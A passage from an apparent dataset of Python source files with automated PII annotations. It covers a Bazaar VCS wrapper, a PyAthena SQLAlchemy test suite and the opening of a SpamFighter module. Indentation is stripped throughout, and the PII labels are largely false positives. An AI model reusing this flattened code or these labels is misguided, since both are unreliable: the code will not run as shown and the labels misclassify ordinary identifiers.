root = os.path.split(path)[0]
else:
root = path
while True:
if not root:
break
if os.path.exists(os.path.join(root, '.bzr')):
break
else:
root = os.path.split(root)[0]
# Cache the repo of this path for faster lookups next time
self.repocache[path] = root
return root
def isControlled(self, path):
"""""" Is the path controlled by BZR? """"""
t1 = time.time()
# Check for cached paths to speed up lookup
if path in self.ccache:
return True
if not os.path.isdir(path):
root = os.path.split(path)[0]
else:
root = path
last = False
while True:
if os.path.exists(os.path.join(root, '.bzr')):
# If a containing directory of the given path has a .bzr
# directory in it run status to find out if the file is being
# tracked or not.
retval = False
out = self.run(root + os.sep, ['status', '-S', path])
if out:
lines = out.stdout.readline()
if lines.startswith('?'):
fname = lines.split(None, 1)[1].strip()
fname = fname.rstrip(os.sep)
retval = not path.endswith(fname)
else:
retval = True
self.closeProcess(out)
if retval:
self.ccache.append(path)
return retval
elif last:
break
else:
root, tail = os.path.split(root)
# If tail is None or '' then this has gotten to the root
# so mark it as the last run
if not tail:
last = True
return False
def add(self, paths):
"""""" Add paths to the repository """"""
root, files = self.splitFiles(paths)
out = self.run(root, ['add'] + files)
self.logOutput(out)
self.closeProcess(out)
def checkout(self, paths):
"""""" Checkout files at the given path """"""
root, files = self.splitFiles(paths)
out = self.run(root, ['checkout',], files)
self.logOutput(out)
self.closeProcess(out)
def commit(self, paths, message=''):
"""""" Commit paths to the repository """"""
root, files = self.splitFiles(paths)
out = self.run(root, ['commit', '-m', message] + files)
self.logOutput(out)
self.closeProcess(out)
def diff(self, paths):
"""""" Run the diff program on the given files """"""
root, files = self.splitFiles(paths)
out = self.run(root, ['diff'] + files)
self.closeProcess(out)
def makePatch(self, paths):
"""""" Make a patch of the given paths """"""
root, files = self.splitFiles(paths)
patches = list()
for fname in files:
out = self.run(root, ['diff', fname])
lines = [ line for line in out.stdout ]
self.closeProcess(out)
patches.append((fname, ''.join(lines)))
return patches
def history(self, paths, history=None):
"""""" Get the revision history of the given paths """"""
if history is None:
history = []
root, files = self.splitFiles(paths)
for fname in files:
out = self.run(root, ['log', fname])
logstart = False
if out:
for line in out.stdout:
self.log(line)
if line.strip().startswith('-----------'):
logstart = False
current = dict(path=fname, revision=None,
author=None, date=None, log=u'')
history.append(current)
elif line.startswith('message:'):
logstart = True
elif logstart:
current['log'] += DecodeString(line)
elif line.startswith('revno:'):
current['revision'] = DecodeString(line.split(None, 1)[-1].strip())
elif line.startswith('committer:'):
author = line.split(None, 1)[-1]
current['author'] = DecodeString(author.strip())
elif line.startswith('timestamp:'):
date = line.split(None, 1)[-1]
current['date'] = self.str2datetime(date.strip())
else:
pass
self.logOutput(out)
self.closeProcess(out)
return history
def str2datetime(self, tstamp):
"""""" Convert a timestamp string to a datetime object """"""
parts = tstamp.split()
ymd = [int(x.strip()) for x in parts[1].split('-')]
hms = [int(x.strip()) for x in parts[2].split(':')]
date = ymd + hms
return datetime.datetime(*date)
def remove(self, paths):
"""""" Recursively remove paths from repository """"""
root, files = self.splitFiles(paths)
out = self.run(root, ['remove', '--force'] + files)
self.logOutput(out)
def status(self, paths, recursive=False, status=dict()):
"""""" Get BZR status information from given file/directory """"""
codes = {' ':'uptodate', 'N':'added', 'C':'conflict', 'D':'deleted',
'M':'modified'}
root, files = self.splitFiles(paths)
# -S gives output similar to svn which is a little easier to work with
out = self.run(root, ['status', '-S'] + files)
repo = self.getRepository(paths[0])
relpath = root.replace(repo, '', 1).lstrip(os.sep)
unknown = list()
if out:
for line in out.stdout:
self.log(line)
txt = line.lstrip(' +-')
# Split the status code and relative file path
code, fname = txt.split(None, 1)
fname = fname.replace(u'/', os.sep).strip().rstrip(os.sep)
fname = fname.replace(relpath, '', 1).lstrip(os.sep)
code = code.rstrip('*')
# Skip unknown files
if code == '?':
unknown.append(fname)
continue
# Get the absolute file path
current = dict()
try:
current['status'] = codes[code]
status[fname] = current
except KeyError:
pass
# Find up to date files
unknown += status.keys()
for path in os.listdir(root):
if path not in unknown:
status[path] = dict(status='uptodate')
self.logOutput(out)
return status
def update(self, paths):
"""""" Recursively update paths """"""
root, files = self.splitFiles(paths)
out = self.run(root, ['update'] + files)
self.logOutput(out)
def revert(self, paths):
"""""" Recursively revert paths to repository version """"""
root, files = self.splitFiles(paths)
if not files:
files = ['.']
out = self.run(root, ['revert'] + files)
self.logOutput(out)
def fetch(self, paths, rev=None, date=None):
"""""" Fetch a copy of the paths' contents """"""
output = []
for path in paths:
if os.path.isdir(path):
continue
root, files = self.splitFiles(path)
options = []
if rev:
options.append('-r')
options.append(str(rev))
if date:
# Date format YYYY-MM-DD,HH:MM:SS
options.append('-r')
options.append('date:%s' % date)
out = self.run(root, ['cat'] + options + files)
if out:
output.append(out.stdout.read())
self.logOutput(out)
else:
output.append(None)
return output
",9977,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Cody Precord '], ['PERSON', 'Cody Precord'], ['PERSON', 'Cody Precord'], ['PERSON', 'Cody Precord'], ['DATE_TIME', '2009-05-06'], ['LOCATION', 'self.ccache'], ['PERSON', 'fname = lines.split(None'], ['PERSON', 'fname'], ['PERSON', 'logstart'], ['PERSON', '= line.split(None'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'BZR.py'], ['URL', 'BZR.BZ'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'os.path.is'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'self.re'], ['URL', 'self.cc'], ['URL', 'os.path.is'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'os.path.jo'], ['URL', 'self.ru'], ['URL', 'os.se'], ['URL', 'out.stdout.re'], ['URL', 'lines.st'], ['URL', 'fname.rs'], ['URL', 'os.se'], ['URL', 'self.cl'], ['URL', 'self.cc'], ['URL', 'os.pa'], ['URL', 'self.ru'], ['URL', 'self.cl'], ['URL', 'self.ru'], ['URL', 'self.cl'], ['URL', 'self.ru'], ['URL', 'self.cl'], ['URL', 'self.ru'], ['URL', 'self.cl'], ['URL', 'self.ru'], ['URL', 'out.st'], ['URL', 'self.cl'], ['URL', 'self.ru'], ['URL', 'out.st'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'author.st'], ['URL', 'line.st'], ['URL', 'self.st'], ['URL', 'date.st'], ['URL', 'self.cl'], ['URL', 'x.st'], ['URL', 'x.st'], ['URL', 'self.ru'], ['URL', 'self.ru'], ['URL', 'self.ge'], ['URL', 'root.re'], ['URL', 'os.se'], ['URL', 'out.st'], ['URL', 'line.ls'], ['URL', 'fname.re'], ['URL', 'os.se'], ['URL', 'os.se'], ['URL', 'fname.re'], ['URL', 'os.se'], ['URL', 'code.rs'], ['URL', 'status.ke'], ['URL', 'os.li'], ['URL', 'self.ru'], ['URL', 'self.ru'], ['URL', 'os.path.is'], ['URL', 'self.ru'], ['URL', 'out.stdout.re']]"
63,"# -*- coding: utf-8 -*-
import re
import unittest
import uuid
from datetime import date, datetime
from decimal import Decimal
from urllib.parse import quote_plus
import numpy as np
import pandas as pd
import sqlalchemy
from sqlalchemy import String
from sqlalchemy.engine import create_engine
from sqlalchemy.exc import NoSuchTableError, OperationalError, ProgrammingError
from sqlalchemy.sql import expression
from sqlalchemy.sql.schema import Column, MetaData, Table
from sqlalchemy.sql.sqltypes import (
BIGINT,
BINARY,
BOOLEAN,
DATE,
DECIMAL,
FLOAT,
INTEGER,
STRINGTYPE,
TIMESTAMP,
)
from tests.conftest import ENV, SCHEMA
from tests.util import with_engine
class TestSQLAlchemyAthena(unittest.TestCase):
""""""Reference test case is following:
https://github.com/dropbox/PyHive/blob/master/pyhive/tests/sqlalchemy_test_case.py
https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_hive.py
https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_presto.py
""""""
def create_engine(self, **kwargs):
conn_str = (
""awsathena+rest://athena.{region_name}.amazonaws.com:443/""
+ ""{schema_name}?s3_staging_dir={s3_staging_dir}&s3_dir={s3_dir}""
+ ""&compression=snappy""
)
if ""verify"" in kwargs:
conn_str += ""&verify={verify}""
if ""duration_seconds"" in kwargs:
conn_str += ""&duration_seconds={duration_seconds}""
if ""poll_interval"" in kwargs:
conn_str += ""&poll_interval={poll_interval}""
if ""kill_on_interrupt"" in kwargs:
conn_str += ""&kill_on_interrupt={kill_on_interrupt}""
return create_engine(
conn_str.format(
region_name=ENV.region_name,
schema_name=SCHEMA,
s3_staging_dir=quote_plus(ENV.s3_staging_dir),
s3_dir=quote_plus(ENV.s3_staging_dir),
**kwargs
)
)
@with_engine()
def test_basic_query(self, engine, conn):
rows = conn.execute(""SELECT * FROM one_row"").fetchall()
self.assertEqual(len(rows), 1)
self.assertEqual(rows[0].number_of_rows, 1)
self.assertEqual(len(rows[0]), 1)
@with_engine()
def test_reflect_no_such_table(self, engine, conn):
self.assertRaises(
NoSuchTableError,
lambda: Table(""this_does_not_exist"", MetaData(bind=engine), autoload=True),
)
self.assertRaises(
NoSuchTableError,
lambda: Table(
""this_does_not_exist"",
MetaData(bind=engine),
schema=""also_does_not_exist"",
autoload=True,
),
)
@with_engine()
def test_reflect_table(self, engine, conn):
one_row = Table(""one_row"", MetaData(bind=engine), autoload=True)
self.assertEqual(len(one_row.c), 1)
self.assertIsNotNone(one_row.c.number_of_rows)
@with_engine()
def test_reflect_table_with_schema(self, engine, conn):
one_row = Table(""one_row"", MetaData(bind=engine), schema=SCHEMA, autoload=True)
self.assertEqual(len(one_row.c), 1)
self.assertIsNotNone(one_row.c.number_of_rows)
@with_engine()
def test_reflect_table_include_columns(self, engine, conn):
one_row_complex = Table(""one_row_complex"", MetaData(bind=engine))
version = float(
re.search(r""^([\d]+\.[\d]+)\..+"", sqlalchemy.__version__).group(1)
)
if version <= 1.2:
engine.dialect.reflecttable(
conn, one_row_complex, include_columns=[""col_int""], exclude_columns=[]
)
elif version == 1.3:
# https://docs.sqlalchemy.org/en/13/changelog/changelog_13.html
# #PI:KEY
engine.dialect.reflecttable(
conn,
one_row_complex,
include_columns=[""col_int""],
exclude_columns=[],
resolve_fks=True,
)
else: # version >= 1.4
# https://docs.sqlalchemy.org/en/14/changelog/changelog_14.html
# #change-0215fae622c01f9409eb1ba2754f4792
# https://docs.sqlalchemy.org/en/14/core/reflection.html
# #sqlalchemy.engine.reflection.Inspector.reflect_table
insp = sqlalchemy.inspect(engine)
insp.reflect_table(
one_row_complex,
include_columns=[""col_int""],
exclude_columns=[],
resolve_fks=True,
)
self.assertEqual(len(one_row_complex.c), 1)
self.assertIsNotNone(one_row_complex.c.col_int)
self.assertRaises(AttributeError, lambda: one_row_complex.c.col_tinyint)
@with_engine()
def test_unicode(self, engine, conn):
unicode_str = ""密林""
one_row = Table(""one_row"", MetaData(bind=engine))
returned_str = sqlalchemy.select(
[expression.bindparam(""あまぞん"", unicode_str, type_=String())],
from_obj=one_row,
).scalar()
self.assertEqual(returned_str, unicode_str)
@with_engine()
def test_reflect_schemas(self, engine, conn):
insp = sqlalchemy.inspect(engine)
schemas = insp.get_schema_names()
self.assertIn(SCHEMA, schemas)
self.assertIn(""default"", schemas)
@with_engine()
def test_get_table_names(self, engine, conn):
meta = MetaData()
meta.reflect(bind=engine)
print(meta.tables)
self.assertIn(""one_row"", meta.tables)
self.assertIn(""one_row_complex"", meta.tables)
insp = sqlalchemy.inspect(engine)
self.assertIn(
""many_rows"",
insp.get_table_names(schema=SCHEMA),
)
@with_engine()
def test_has_table(self, engine, conn):
insp = sqlalchemy.inspect(engine)
self.assertTrue(insp.has_table(""one_row"", schema=SCHEMA))
self.assertFalse(insp.has_table(""this_table_does_not_exist"", schema=SCHEMA))
@with_engine()
def test_get_columns(self, engine, conn):
insp = sqlalchemy.inspect(engine)
actual = insp.get_columns(table_name=""one_row"", schema=SCHEMA)[0]
self.assertEqual(actual[""name""], ""number_of_rows"")
self.assertTrue(isinstance(actual[""type""], INTEGER))
self.assertTrue(actual[""nullable""])
self.assertIsNone(actual[""default""])
self.assertEqual(actual[""ordinal_position""], 1)
self.assertIsNone(actual[""comment""])
@with_engine()
def test_char_length(self, engine, conn):
one_row_complex = Table(""one_row_complex"", MetaData(bind=engine), autoload=True)
result = (
sqlalchemy.select(
[sqlalchemy.func.char_length(one_row_complex.c.col_string)]
)
.execute()
.scalar()
)
self.assertEqual(result, len(""a string""))
@with_engine()
def test_reflect_select(self, engine, conn):
one_row_complex = Table(""one_row_complex"", MetaData(bind=engine), autoload=True)
self.assertEqual(len(one_row_complex.c), 15)
self.assertIsInstance(one_row_complex.c.col_string, Column)
rows = one_row_complex.select().execute().fetchall()
self.assertEqual(len(rows), 1)
self.assertEqual(
list(rows[0]),
[
True,
127,
32767,
2147483647,
9223372036854775807,
0.5,
0.25,
""a string"",
datetime(2017, 1, 1, 0, 0, 0),
date(2017, 1, 2),
b""123"",
""[1, 2]"",
""{1=2, 3=4}"",
""{a=1, b=2}"",
Decimal(""0.1""),
],
)
self.assertIsInstance(one_row_complex.c.col_boolean.type, BOOLEAN)
self.assertIsInstance(one_row_complex.c.col_tinyint.type, INTEGER)
self.assertIsInstance(one_row_complex.c.col_smallint.type, INTEGER)
self.assertIsInstance(one_row_complex.c.col_int.type, INTEGER)
self.assertIsInstance(one_row_complex.c.col_bigint.type, BIGINT)
self.assertIsInstance(one_row_complex.c.col_float.type, FLOAT)
self.assertIsInstance(one_row_complex.c.col_double.type, FLOAT)
self.assertIsInstance(one_row_complex.c.col_string.type, type(STRINGTYPE))
self.assertIsInstance(one_row_complex.c.col_timestamp.type, TIMESTAMP)
self.assertIsInstance(one_row_complex.c.col_date.type, DATE)
self.assertIsInstance(one_row_complex.c.col_binary.type, BINARY)
self.assertIsInstance(one_row_complex.c.col_array.type, type(STRINGTYPE))
self.assertIsInstance(one_row_complex.c.col_map.type, type(STRINGTYPE))
self.assertIsInstance(one_row_complex.c.col_struct.type, type(STRINGTYPE))
self.assertIsInstance(one_row_complex.c.col_decimal.type, DECIMAL)
@with_engine()
def test_reserved_words(self, engine, conn):
""""""Presto uses double quotes, not backticks""""""
fake_table = Table(
""select"", MetaData(bind=engine), Column(""current_timestamp"", STRINGTYPE)
)
query = str(fake_table.select(fake_table.c.current_timestamp == ""a""))
self.assertIn('""select""', query)
self.assertIn('""current_timestamp""', query)
self.assertNotIn(""`select`"", query)
self.assertNotIn(""`current_timestamp`"", query)
@with_engine()
def test_retry_if_data_catalog_exception(self, engine, conn):
dialect = engine.dialect
exc = OperationalError(
"""", None, ""Database does_not_exist not found. Please check your query.""
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, ""does_not_exist"", ""does_not_exist""
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, ""does_not_exist"", ""this_does_not_exist""
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, ""this_does_not_exist"", ""does_not_exist""
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, ""this_does_not_exist"", ""this_does_not_exist""
)
)
exc = OperationalError(
"""", None, ""Namespace does_not_exist not found. Please check your query.""
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, ""does_not_exist"", ""does_not_exist""
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, ""does_not_exist"", ""this_does_not_exist""
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, ""this_does_not_exist"", ""does_not_exist""
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, ""this_does_not_exist"", ""this_does_not_exist""
)
)
exc = OperationalError(
"""", None, ""Table does_not_exist not found. Please check your query.""
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, ""does_not_exist"", ""does_not_exist""
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, ""does_not_exist"", ""this_does_not_exist""
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, ""this_does_not_exist"", ""does_not_exist""
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, ""this_does_not_exist"", ""this_does_not_exist""
)
)
exc = OperationalError("""", None, ""foobar."")
self.assertTrue(
dialect._retry_if_data_catalog_exception(exc, ""foobar"", ""foobar"")
)
exc = ProgrammingError(
"""", None, ""Database does_not_exist not found. Please check your query.""
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, ""does_not_exist"", ""does_not_exist""
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, ""does_not_exist"", ""this_does_not_exist""
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, ""this_does_not_exist"", ""does_not_exist""
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, ""this_does_not_exist"", ""this_does_not_exist""
)
)
@with_engine()
def test_get_column_type(self, engine, conn):
dialect = engine.dialect
self.assertEqual(dialect._get_column_type(""boolean""), ""boolean"")
self.assertEqual(dialect._get_column_type(""tinyint""), ""tinyint"")
self.assertEqual(dialect._get_column_type(""smallint""), ""smallint"")
self.assertEqual(dialect._get_column_type(""integer""), ""integer"")
self.assertEqual(dialect._get_column_type(""bigint""), ""bigint"")
self.assertEqual(dialect._get_column_type(""real""), ""real"")
self.assertEqual(dialect._get_column_type(""double""), ""double"")
self.assertEqual(dialect._get_column_type(""varchar""), ""varchar"")
self.assertEqual(dialect._get_column_type(""timestamp""), ""timestamp"")
self.assertEqual(dialect._get_column_type(""date""), ""date"")
self.assertEqual(dialect._get_column_type(""varbinary""), ""varbinary"")
self.assertEqual(dialect._get_column_type(""array(integer)""), ""array"")
self.assertEqual(dialect._get_column_type(""map(integer, integer)""), ""map"")
self.assertEqual(dialect._get_column_type(""row(a integer, b integer)""), ""row"")
self.assertEqual(dialect._get_column_type(""decimal(10,1)""), ""decimal"")
@with_engine()
def test_contain_percents_character_query(self, engine, conn):
select = sqlalchemy.sql.text(
""""""
SELECT date_parse('20191030', '%Y%m%d')
""""""
)
table_expression = sqlalchemy.sql.selectable.TextAsFrom(select, []).cte()
query = sqlalchemy.select([""*""]).select_from(table_expression)
result = engine.execute(query)
self.assertEqual(result.fetchall(), [(datetime(2019, 10, 30),)])
query_with_limit = (
sqlalchemy.sql.select([""*""]).select_from(table_expression).limit(1)
)
result_with_limit = engine.execute(query_with_limit)
self.assertEqual(result_with_limit.fetchall(), [(datetime(2019, 10, 30),)])
@with_engine()
def test_query_with_parameter(self, engine, conn):
select = sqlalchemy.sql.text(
""""""
SELECT :word
""""""
)
table_expression = sqlalchemy.sql.selectable.TextAsFrom(select, []).cte()
query = sqlalchemy.select([""*""]).select_from(table_expression)
result = engine.execute(query, word=""cat"")
self.assertEqual(result.fetchall(), [(""cat"",)])
query_with_limit = (
sqlalchemy.select([""*""]).select_from(table_expression).limit(1)
)
result_with_limit = engine.execute(query_with_limit, word=""cat"")
self.assertEqual(result_with_limit.fetchall(), [(""cat"",)])
@with_engine()
def test_contain_percents_character_query_with_parameter(self, engine, conn):
select1 = sqlalchemy.sql.text(
""""""
SELECT date_parse('20191030', '%Y%m%d'), :word
""""""
)
table_expression1 = sqlalchemy.sql.selectable.TextAsFrom(select1, []).cte()
query1 = sqlalchemy.select([""*""]).select_from(table_expression1)
result1 = engine.execute(query1, word=""cat"")
self.assertEqual(result1.fetchall(), [(datetime(2019, 10, 30), ""cat"")])
query_with_limit1 = (
sqlalchemy.select([""*""]).select_from(table_expression1).limit(1)
)
result_with_limit1 = engine.execute(query_with_limit1, word=""cat"")
self.assertEqual(
result_with_limit1.fetchall(), [(datetime(2019, 10, 30), ""cat"")]
)
select2 = sqlalchemy.sql.text(
""""""
SELECT col_string, :param FROM one_row_complex
WHERE col_string LIKE 'a%' OR col_string LIKE :param
""""""
)
table_expression2 = sqlalchemy.sql.selectable.TextAsFrom(select2, []).cte()
query2 = sqlalchemy.select([""*""]).select_from(table_expression2)
result2 = engine.execute(query2, param=""b%"")
self.assertEqual(result2.fetchall(), [(""a string"", ""b%"")])
query_with_limit2 = (
sqlalchemy.select([""*""]).select_from(table_expression2).limit(1)
)
result_with_limit2 = engine.execute(query_with_limit2, param=""b%"")
self.assertEqual(result_with_limit2.fetchall(), [(""a string"", ""b%"")])
@with_engine()
def test_nan_checks(self, engine, conn):
dialect = engine.dialect
self.assertFalse(dialect._is_nan(""string""))
self.assertFalse(dialect._is_nan(1))
self.assertTrue(dialect._is_nan(float(""nan"")))
@with_engine()
def test_to_sql(self, engine, conn):
# TODO pyathena.error.OperationalError: SYNTAX_ERROR: line 1:305:
# Column 'foobar' cannot be resolved.
# def _format_bytes(formatter, escaper, val):
# return val.decode()
table_name = ""to_sql_{0}"".format(str(uuid.uuid4()).replace(""-"", """"))
df = pd.DataFrame(
{
""col_int"": np.int32([1]),
""col_bigint"": np.int64([12345]),
""col_float"": np.float32([1.0]),
""col_double"": np.float64([1.2345]),
""col_string"": [""a""],
""col_boolean"": np.bool_([True]),
""col_timestamp"": [datetime(2020, 1, 1, 0, 0, 0)],
""col_date"": [date(2020, 12, 31)],
# ""col_binary"": ""foobar"".encode(),
}
)
# Explicitly specify column order
df = df[
[
""col_int"",
""col_bigint"",
""col_float"",
""col_double"",
""col_string"",
""col_boolean"",
""col_timestamp"",
""col_date"",
# ""col_binary"",
]
]
df.to_sql(
table_name,
engine,
schema=SCHEMA,
index=False,
if_exists=""replace"",
method=""multi"",
)
table = Table(table_name, MetaData(bind=engine), autoload=True)
self.assertEqual(
table.select().execute().fetchall(),
[
(
1,
12345,
1.0,
1.2345,
""a"",
True,
datetime(2020, 1, 1, 0, 0, 0),
date(2020, 12, 31),
# ""foobar"".encode(),
)
],
)
@with_engine(verify=""false"")
def test_conn_str_verify(self, engine, conn):
kwargs = conn.connection._kwargs
self.assertFalse(kwargs[""verify""])
@with_engine(duration_seconds=""1800"")
def test_conn_str_duration_seconds(self, engine, conn):
kwargs = conn.connection._kwargs
self.assertEqual(kwargs[""duration_seconds""], 1800)
@with_engine(poll_interval=""5"")
def test_conn_str_poll_interval(self, engine, conn):
self.assertEqual(conn.connection.poll_interval, 5)
@with_engine(kill_on_interrupt=""false"")
def test_conn_str_kill_on_interrupt(self, engine, conn):
self.assertFalse(conn.connection.kill_on_interrupt)
",20066,"[['URL', 'urllib.pa'], ['LOCATION', 'TestCase'], ['PERSON', 'quote_plus(ENV.s3_staging_dir'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'one_row_complex'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['PERSON', 'meta.tables'], ['PERSON', 'meta.tables'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'datetime(2017'], ['PERSON', 'Decimal(""0.1'], ['LOCATION', 'conn'], ['PERSON', 'fake_table'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['PERSON', 'TextAsFrom(select'], ['LOCATION', 'conn'], ['PERSON', 'TextAsFrom(select'], ['LOCATION', 'conn'], ['PERSON', 'select1'], ['PERSON', 'query1'], ['PERSON', 'sqlalchemy.select([""*""]).select_from(table_expression1'], ['PERSON', 'query2 ='], ['PERSON', 'result2'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['PERSON', 'TODO'], ['DATE_TIME', '12'], ['DATE_TIME', '12'], ['LOCATION', 'conn'], ['NRP', 'kwargs'], ['LOCATION', 'conn'], ['NRP', 'kwargs'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['URL', 'https://github.com/dropbox/PyHive/blob/master/pyhive/tests/sqlalchemy_test_case.py'], ['URL', 'https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_hive.py'], ['URL', 'https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_presto.py'], ['URL', 'https://docs.sqlalchemy.org/en/13/changelog/changelog_13.html'], ['URL', 'https://docs.sqlalchemy.org/en/14/changelog/changelog_14.html'], ['URL', 'https://docs.sqlalchemy.org/en/14/core/reflection.html'], ['URL', 'sqlalchemy.sql.sc'], ['URL', 'tests.co'], ['URL', '.amazonaws.com'], ['URL', 'str.fo'], ['URL', 'ENV.re'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'row.c.nu'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'row.c.nu'], ['URL', 're.se'], ['URL', 'engine.dialect.re'], ['URL', 'engine.dialect.re'], ['URL', 'sqlalchemy.engine.reflection.Inspector.re'], ['URL', 'sqlalchemy.in'], ['URL', 'insp.re'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'sqlalchemy.se'], ['URL', 'expression.bi'], ['URL', 'self.as'], ['URL', 'sqlalchemy.in'], ['URL', 'insp.ge'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'meta.re'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'sqlalchemy.in'], ['URL', 'self.as'], ['URL', 'insp.ge'], ['URL', 'sqlalchemy.in'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'sqlalchemy.in'], ['URL', 'insp.ge'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'sqlalchemy.se'], ['URL', 'sqlalchemy.func.ch'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'complex.se'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'table.se'], ['URL', 'table.c.cu'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'sqlalchemy.sql.se'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.sql.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.sql.se'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.sql.se'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.sql.se'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'pyathena.er'], ['URL', 'val.de'], ['URL', 'np.int'], ['URL', 'np.int'], ['URL', 'np.bo'], ['URL', 'df.to'], ['URL', 'self.as'], ['URL', 'table.se'], ['URL', 'conn.co'], ['URL', 'self.as'], ['URL', 'conn.co'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'conn.co'], ['URL', 'self.as'], ['URL', 'conn.connection.ki']]"
64,"# -*- coding: utf-8 -*-
#
# SpamFighter, Copyright 2008, 2009 NetStream LLC (http://netstream.ru/, dummy@email.com)
#
# This file is part of SpamFighter.
#
# SpamFighter is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SpamFighter is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SpamFighter. If not, see .
#
""""""
Модуль авторизации партнеров без логинов/паролей (на доверии).
""""""
from zope.interface import implements
from twisted.internet import defer
from spamfighter.interfaces import IPartner, IPartnerAuthorizer
from spamfighter.core.partner import PartnerAuthorizationFailedError
